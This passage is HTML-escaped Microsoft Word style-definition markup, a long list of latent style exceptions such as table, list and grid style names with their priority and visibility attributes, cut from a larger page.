  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;No List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Outline List 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Outline List 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Outline List 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Simple 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Simple 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Simple 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Classic 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Classic 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Classic 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Classic 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Colorful 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Colorful 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Colorful 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Columns 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Columns 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Columns 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Columns 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Columns 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Grid 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 7&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table List 8&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table 3D effects 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table 3D effects 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table 3D effects 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Contemporary&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Elegant&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Professional&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Subtle 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Subtle 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Web 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Web 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Web 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Balloon Text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; Name=&quot;Table Grid&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; UnhideWhenUsed=&quot;true&quot;
   Name=&quot;Table Theme&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; Name=&quot;Placeholder Text&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;1&quot; QFormat=&quot;true&quot; Name=&quot;No Spacing&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; SemiHidden=&quot;true&quot; Name=&quot;Revision&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;34&quot; QFormat=&quot;true&quot;
   Name=&quot;List Paragraph&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;29&quot; QFormat=&quot;true&quot; Name=&quot;Quote&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;30&quot; QFormat=&quot;true&quot;
   Name=&quot;Intense Quote&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;60&quot; Name=&quot;Light Shading Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;61&quot; Name=&quot;Light List Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;62&quot; Name=&quot;Light Grid Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;63&quot; Name=&quot;Medium Shading 1 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;64&quot; Name=&quot;Medium Shading 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;65&quot; Name=&quot;Medium List 1 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;66&quot; Name=&quot;Medium List 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;67&quot; Name=&quot;Medium Grid 1 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;68&quot; Name=&quot;Medium Grid 2 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;69&quot; Name=&quot;Medium Grid 3 Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;70&quot; Name=&quot;Dark List Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;71&quot; Name=&quot;Colorful Shading Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;72&quot; Name=&quot;Colorful List Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;73&quot; Name=&quot;Colorful Grid Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;19&quot; QFormat=&quot;true&quot;
   Name=&quot;Subtle Emphasis&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;21&quot; QFormat=&quot;true&quot;
   Name=&quot;Intense Emphasis&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;31&quot; QFormat=&quot;true&quot;
   Name=&quot;Subtle Reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;32&quot; QFormat=&quot;true&quot;
   Name=&quot;Intense Reference&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;33&quot; QFormat=&quot;true&quot; Name=&quot;Book Title&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;37&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; Name=&quot;Bibliography&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;39&quot; SemiHidden=&quot;true&quot;
   UnhideWhenUsed=&quot;true&quot; QFormat=&quot;true&quot; Name=&quot;TOC Heading&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;41&quot; Name=&quot;Plain Table 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;42&quot; Name=&quot;Plain Table 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;43&quot; Name=&quot;Plain Table 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;44&quot; Name=&quot;Plain Table 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;45&quot; Name=&quot;Plain Table 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;40&quot; Name=&quot;Grid Table Light&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot; Name=&quot;Grid Table 1 Light&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot; Name=&quot;Grid Table 6 Colorful&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot; Name=&quot;Grid Table 7 Colorful&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;Grid Table 1 Light Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4 Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;Grid Table 6 Colorful Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;Grid Table 7 Colorful Accent 1&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;Grid Table 1 Light Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4 Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;Grid Table 6 Colorful Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;Grid Table 7 Colorful Accent 2&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;Grid Table 1 Light Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4 Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;Grid Table 6 Colorful Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;Grid Table 7 Colorful Accent 3&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;Grid Table 1 Light Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4 Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;Grid Table 6 Colorful Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;Grid Table 7 Colorful Accent 4&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;Grid Table 1 Light Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;48&quot; Name=&quot;Grid Table 3 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;49&quot; Name=&quot;Grid Table 4 Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;50&quot; Name=&quot;Grid Table 5 Dark Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;51&quot;
   Name=&quot;Grid Table 6 Colorful Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;52&quot;
   Name=&quot;Grid Table 7 Colorful Accent 5&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;46&quot;
   Name=&quot;Grid Table 1 Light Accent 6&quot;/&gt;
  &lt;w:LsdException Locked=&quot;false&quot; Priority=&quot;47&quot; Name=&quot;Grid Table 2 Accent 6&quot;/&gt;
